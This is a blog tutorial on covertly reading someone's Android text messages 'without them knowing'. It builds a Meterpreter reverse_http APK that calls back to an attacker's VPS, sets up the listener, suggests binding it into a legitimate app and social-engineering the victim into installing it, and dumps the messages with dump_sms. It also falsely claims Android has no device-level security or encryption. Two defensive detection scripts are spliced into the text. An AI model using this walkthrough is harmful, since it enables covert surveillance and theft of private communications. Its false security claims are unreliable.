How to Monitor Text Messages on Android (Secretly)


Is it possible to monitor someone’s text messages on Android without having their phones? The answer is a concrete yes! And this tutorial shows how to do that using the Metasploit Framework.

Android phones have zero device-level security or encryption. This means that data stored on the Android system can be accessed by apps or other methods very easily in readable formats. Anyone can essentially make an app that sends and receives data out of it and reads that data in cleartext.

And also because Android is open source, it’s not too difficult for attackers to make malicious apps that hook into the Android system to retrieve the information the attacker cares about.

What You’ll Need

In this tutorial I am going to demonstrate how easy it is to monitor the text messages on my Android phone over the internet, i.e. a wide area network (WAN).

This is unlike the other tutorials on this topic, which are done over a local area network (LAN). So you are going to need the following:

  • A VPS server. You can rent a cheap VPS from Digital Ocean for $10 using this link.
  • Metasploit-Framework Installed. On the VPS, install the latest version of Metasploit.
  • An Android phone. This is the target whose text messages we will monitor remotely.

Monitor Text Messages on Someone’s Phone Without Them Knowing

You can follow the rest of this written guide, or click this video below if you want to watch a live demo of me spying or monitoring text messages on my own Android phone.

Step 1: Acquire & Connect to the Attack VPS Server

There are very few VPS services out there that allow penetration testing or hacking activities to be done from their servers, and Digital Ocean is one of them.

So head over to the Digital Ocean website and create an account. When you’re signed in, create a new droplet. “Droplet” is what Digital Ocean calls their VPS instances.

Create New Droplet on Digital Ocean

Choose an image or distribution to install. Since Metasploit is a Debian-based project, we will select the latest version of Debian.

Choose Debian Image Create New Droplet

Next, you want to select a plan. The basic $10 plan, which gives 2GB of RAM and 1 CPU core, will suffice for running this test.

Select a Plan Create New Droplet

Select a datacenter region. Generally, the closer the datacenter region to the target the better.

Choose VPS Datacenter Create New Droplet

Set a password for authenticating to the VPS droplet. It’s recommended to use SSH keys for more secure authentication, but we will use a password to keep things simple.

Set VPS Authentication Create New Droplet

Finally, click “Create Droplet” to spin up the server. The process is pretty fast and in a moment you’ll be presented with the IP address of your new server.

Now to connect to the server, Linux and Mac users can fire up a terminal window and type in the following command.

ssh root@<the VPS IP address>

It will prompt for the password you set during creation.

But if you’re running a Windows PC, you are going to need to install a program to communicate with the server, and the PuTTY SSH client is the best recommendation.

Head over to their official website to download the latest version of PuTTY and install it. The installation is a breeze and in a moment you’re up and running.

Now to connect to your VPS server with PuTTY, type the IP address of the server in the Host Name field and click Open.

Connect to VPS server with PuTTY SSH client

The username is root and the password is the one you set during the VPS creation.

Step 2: Install Metasploit FrameWork

After you log in to the VPS server you are going to install the Metasploit Framework, which is our tool of attack.

But before that, let’s update and upgrade the server so that things run smoothly.

apt update && apt upgrade -y

Next, run the below command to install some dependencies.

apt install curl gnupg gnupg1 gnupg2 -y

After which, run this long one-line command to install the Metasploit package.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

After the installation completes, drop superuser (root) privileges by creating a standard user.

This is so that we can start msfconsole as a standard user, which will allow us to answer the setup questions to create the Metasploit database. Creating a database makes searching through modules much faster and also adds other perks.

adduser <give your preferred username here>
Create Standard VPS User

Drop from root.

su <your username goes here>

Now run msfconsole to set up the MSF database.

Drop From Root Run msfconsole to Start Metasploit

Press enter on all the questions to accept the defaults and soon you’ll end up with a screen like mine below when Metasploit is started.

MSF Console

You can confirm the database is connected by typing db_status within Metasploit.

Check Status of MSF Database Connection

Step 3: Set Up the Attack

With all that prep out of the way, let’s get into the fun part where we set up the attack for our first target.

So there are two things we need to do.

First, we will create the payload which the target will install, penetrating their Android phone; then we’ll set up the listener or command & control (C2) server to receive the callback connection from the phone.

To create the payload, type in the following command. This will generate an APK file (Android app) of about 10KB that will hook the target Android phone when installed.

msfvenom -p android/meterpreter/reverse_http LHOST=10.0.0.1 LPORT=8080 > evil.apk

Where:

  • msfvenom is the payload generation tool within the Metasploit Framework
  • -p indicates the type of payload
  • android/meterpreter/reverse_http is the reverse meterpreter shell that will connect the Android phone back to our listener or command & control server (C2)
  • LHOST is the IP address of your VPS server
  • LPORT is the listening port
  • > evil.apk writes all of that malicious code into an APK file (or Android app), which in this case we have named ‘evil’
msfvenom Payload Creation

To set up the listener, type in the following commands. It’s important to note here that for this to work, both LHOST & LPORT should be the same as that of the payload.

use multi/handler
set PAYLOAD android/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 8080
set exitonsession false
exploit -j
Meterpreter Listener Setup
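On the defender’s side, the callbacks the listener above waits for can be triaged from egress-proxy logs: Metasploit’s reverse_http handler tells stager and session requests apart by an 8-bit checksum of the first URI path segment, so the same client repeatedly hitting one destination with checksum-matching paths is worth a look. This is an added example, not code from this post or from Metasploit; the marker values are as recalled from Metasploit’s UriChecksum module (confirm them against your installed version) and the Squid log lines are constructed.

```python
from collections import Counter
from urllib.parse import urlsplit

# 8-bit URI checksums the reverse_http(s) handler uses to classify a request
# (assumed values from the Rex UriChecksum module; verify for your version).
URI_MARKERS = {92: "INITW/INITN", 80: "INITP", 88: "INITJ (Java/Android)", 98: "CONN"}

def checksum8(segment: str) -> int:
    """Byte sum of a URI path segment, modulo 256."""
    return sum(segment.encode("latin-1")) % 256

def first_segment(path: str) -> str:
    """'/QaZL/extra?x=1' -> 'QaZL': the part the handler checksums."""
    return path.split("?", 1)[0].lstrip("/").split("/", 1)[0]

def classify_path(path: str):
    """Marker name if the path's checksum matches one, else None."""
    return URI_MARKERS.get(checksum8(first_segment(path)))

def find_beacons(squid_log: str, min_hits: int = 3) -> dict:
    """Count checksum-matching requests per (client, destination) in a Squid
    native-format access.log. A random path matches ~1.6% of the time, so only
    repeated matches to one destination are reported; treat this as a lead,
    not proof."""
    hits = Counter()
    for line in squid_log.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        parts = urlsplit(url)
        if classify_path(parts.path):
            hits[(client, parts.netloc)] += 1
    return {k: n for k, n in hits.items() if n >= min_hits}

# Constructed Squid access.log lines using documentation IP ranges. The three
# requests from 192.0.2.10 carry first path segments whose byte sums are 88,
# 88 and 98; the other two are ordinary browsing.
SAMPLE_LOG = """\
1700000000.101    45 192.0.2.10 TCP_MISS/200 612 GET http://203.0.113.5:8080/QaZL - HIER_DIRECT/203.0.113.5 application/octet-stream
1700000001.233    12 192.0.2.10 TCP_MISS/200 102 GET http://203.0.113.5:8080/p7Wkuz - HIER_DIRECT/203.0.113.5 application/octet-stream
1700000002.410    11 192.0.2.10 TCP_MISS/200 4096 POST http://203.0.113.5:8080/xNh4 - HIER_DIRECT/203.0.113.5 application/octet-stream
1700000003.001   310 192.0.2.11 TCP_MISS/200 9216 GET http://www.example.com/index.html - HIER_DIRECT/198.51.100.7 text/html
1700000004.540    80 192.0.2.10 TCP_MISS/200 2048 GET http://www.example.com/api/v1/users - HIER_DIRECT/198.51.100.7 application/json
"""

if __name__ == "__main__":
    for (client, dest), n in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {dest}: {n} checksum-matching requests")
```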

Step 4: Deliver the Payload

OK, what is left is how to deliver the payload to the target Android device. And there are not many ways an attacker could go about this other than social engineering techniques.

So one way to do this is by binding this malicious APK file into another, legitimate Android app and then social engineering the target into installing it on their phone.

Once they install it, their Android phone becomes backdoored to our Metasploit C2 server from where we can issue commands to the device.

But for the purposes of this tutorial, we are just going to access the attacker machine and download the APK payload on the Android device directly.

So we will create a quick server to enable downloading the payload using the below command.

python -m SimpleHTTPServer
Start SimpleHTTPServer to Download Payload

Now enter the IP address of the server and the default port 8000 on a browser to access the payload.

(Don’t forget to press ctrl + c to kill the Simple HTTP server after downloading the payload)

Access Metasploit C2 Server and Download Payload With Browser

After downloading, find the app in the file manager and install it. Launch the app and you will see all the permissions the app is requesting to run with, which is ALL the permissions an Android app could request.

Install Backdoor App With ALL Permissions on Android

Once the user runs the app, a meterpreter session or connection should be established back to our attacker machine or C2 server.

Meterpreter Session Opened on C2 Server

Step 5: Dump Text Messages of Target Android Phone

Finally, it’s time to monitor the text messages on the target Android phones. I say phones because every Android device that installs and runs our little backdoor app will become a zombie of our online Metasploit C2 server.

So to control a particular session or device, type in the following command to interact with that session.

sessions -i <session id number>

Once you’re in a meterpreter session, you can type help to see a list of all commands you can put in the session to control the target Android device.

Interact With meterpreter Sessions

You can see File System Commands for navigating to where sensitive information or data is on the Android device. At this point, you can easily download or upload any information or data.

There is a lot you can do with the backdoor on this Android device but our focus for this post is to monitor the text messages.

Now let’s extract every SMS text message that has been sent back and forth with this Android device by entering the command dump_sms.

Extract SMS Text Messages from Android Device

This will save the extracted SMS in our local directory on the VPS server. We can cat out the file to see the content or download it from the server for closer scrutiny.

View Extracted SMS Text Messages from Android Phone

Now cross-check the extracted SMS text message with the one from my Android phone which I hacked.

Cross check Extracted SMS Text Message on Android Phone

You can check for new text messages on the Android device by running the dump_sms command again. If new SMS have been received on the device, they’ll be extracted and the list updated.

Conclusion

That is how easy it is to spy on SMS text messages on Android devices. To prevent these kinds of attacks from happening to you, you should always be wary of installing applications that are not from the Play Store.

If you must install apps from outside the Play Store, make sure you check what permissions you’re granting the app to run with. If an app requests more permissions than it needs to run, you should uninstall it or not install it at all.

Hope you enjoyed this tutorial; keep coming back for more hacking tutorials like this. If you have a question, you can ask me in the comments section below. And feel free to reach out to me @ojoiszy on Twitter and Instagram if there are tutorials you’d love to see.
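One way to act on that permission advice before a sideloaded APK ever reaches a phone, as an added example that is not from this post: dump the permissions the manifest declares (for instance with the Android SDK’s aapt dump permissions) and flag sets that exceed a single purpose, in particular SMS access paired with network access, which is exactly what an SMS-stealing app needs. The permission table is a curated subset and the two dumps are constructed for the example.

```python
import re

# Subset of Android's runtime ("dangerous") permissions, grouped the way the OS
# prompts for them. Curated for this example, not the complete list.
DANGEROUS_GROUPS = {
    "SMS": {"READ_SMS", "RECEIVE_SMS", "SEND_SMS", "RECEIVE_MMS"},
    "CONTACTS": {"READ_CONTACTS", "WRITE_CONTACTS", "GET_ACCOUNTS"},
    "PHONE": {"READ_PHONE_STATE", "CALL_PHONE", "READ_CALL_LOG"},
    "LOCATION": {"ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION"},
    "MICROPHONE": {"RECORD_AUDIO"},
    "CAMERA": {"CAMERA"},
    "STORAGE": {"READ_EXTERNAL_STORAGE", "WRITE_EXTERNAL_STORAGE"},
}

# Matches both "uses-permission: android.permission.X" (older aapt) and
# "uses-permission: name='android.permission.X'" (newer aapt).
PERM_RE = re.compile(r"uses-permission(?:-sdk-23)?:\s*(?:name=')?android\.permission\.([A-Z_]+)")

def parse_permissions(dump: str) -> set:
    """Permission names (without the android.permission. prefix) in a dump."""
    return set(PERM_RE.findall(dump))

def triage(dump: str, max_groups: int = 2) -> dict:
    """Flag an APK whose requested permissions span more dangerous groups than
    one purpose needs, or that pairs SMS access with INTERNET."""
    perms = parse_permissions(dump)
    groups = {g: sorted(perms & m) for g, m in DANGEROUS_GROUPS.items() if perms & m}
    findings = []
    if "SMS" in groups and "INTERNET" in perms:
        findings.append("SMS access combined with INTERNET: messages can leave the device")
    if len(groups) > max_groups:
        findings.append(f"dangerous permissions in {len(groups)} groups: {', '.join(sorted(groups))}")
    return {"permissions": sorted(perms), "groups": groups, "findings": findings}

# Constructed dumps in the style of `aapt dump permissions <apk>` output;
# the package names are placeholders.
SUSPECT_DUMP = """package: com.example.placeholder
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.RECEIVE_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""
FLASHLIGHT_DUMP = """package: com.example.flashlight
uses-permission: name='android.permission.CAMERA'
"""

if __name__ == "__main__":
    for name, dump in (("suspect", SUSPECT_DUMP), ("flashlight", FLASHLIGHT_DUMP)):
        print(name, triage(dump)["findings"] or ["no findings"])
```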
